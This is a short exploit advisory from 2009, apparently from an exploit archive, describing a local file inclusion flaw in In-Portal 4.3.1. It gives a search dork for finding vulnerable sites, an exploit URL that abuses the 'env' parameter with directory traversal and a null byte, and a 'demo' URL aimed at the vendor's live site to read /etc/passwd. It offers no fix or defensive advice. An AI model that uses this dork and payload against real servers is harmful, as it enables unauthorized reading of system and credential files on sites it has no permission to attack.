In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability

2009-08-04 20:37:31

@ ===================================================================================@
/ Title : Local File Inclusion Vulnerability \
Software : In-Portal 4.3.1
Vendor : http://www.in-portal.net/
[-] [-]
Date : 01 August 2009 (Indonesia)
Author : Angela Chang
Contact : [email protected]
\ /
@ ===================================================================================@

[-] Dork

"Powered by In-portal"

[-] Exploit

http://[site]/[path]/index.php?env=-/[LFI]%00

[-] Demo

http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../../../../../../../etc/passwd%00

{o} ==================================================================================={o}

Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , str0ke


{o}===================================================================================={o}


{o}===================================================================================={o}

#

Fixes

No fixes

In order to submit a new fix you need to be registered.